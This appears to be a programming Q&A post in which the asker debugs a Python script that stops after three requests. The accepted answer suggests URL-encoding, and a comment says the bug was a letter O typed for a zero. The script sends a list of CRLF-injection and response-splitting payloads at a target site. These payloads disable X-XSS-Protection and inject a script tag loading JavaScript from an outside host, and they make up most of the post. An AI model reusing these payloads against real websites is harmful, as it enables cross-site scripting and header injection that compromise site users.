# Requests not sending in Python3

Tags: python-3.x, python-requests, newline

I have an array with some of the requests I want to send. Basically the requests I am sending is the website + directory (in this case: arrays element). For example: `http://randomwebsite.com/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2Fhttp://anotherwebsite.com%3E%0d%0a0%0d%0a/%2e%2e`

My code:

```
import requests

site="http://randomwebsite.com"
tcp_server = "http://anotherwebsite.com"
list_of_requests = [
    "/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%0d%0a0%0d%0a/%2e%2e",
    "/%0a0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3D" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25%30%61X-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25%30aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2e%2e%2f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2f%2e%2e%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2F..%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%3f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%3f%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%u000aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E"]

for payload in list_of_requests:
    ...
    [some code here]
    ...
    if str(payload) in requests.get(site + payload).text:
        print("Request valid")
    else:
        print("Request not valid")
```

My output is this:

```
Request not valid
Request not valid
Request not valid
```

And then the program stops after sending these 3 requests and it stays like that forever. I don't understand why I doesn't continue sending requests.

Answer (score 1, accepted):

That is because the URLs aren't properly encoded.

Try to encode them using [`urllib.parse`](https://docs.python.org/3.3/library/urllib.parse.html?highlight=urlencode) like this:

```
import requests
import urllib.parse

site="http://randomwebsite.com"
tcp_server = urllib.parse.quote("anotherwebsite.com")

... <rest of your code>
```

Comment: I tried your solution, however the problem is still the same, the requests stop being sent after the third request.

Comment: Problem solved. I accidentally put O instead of 0 in the encoded URL.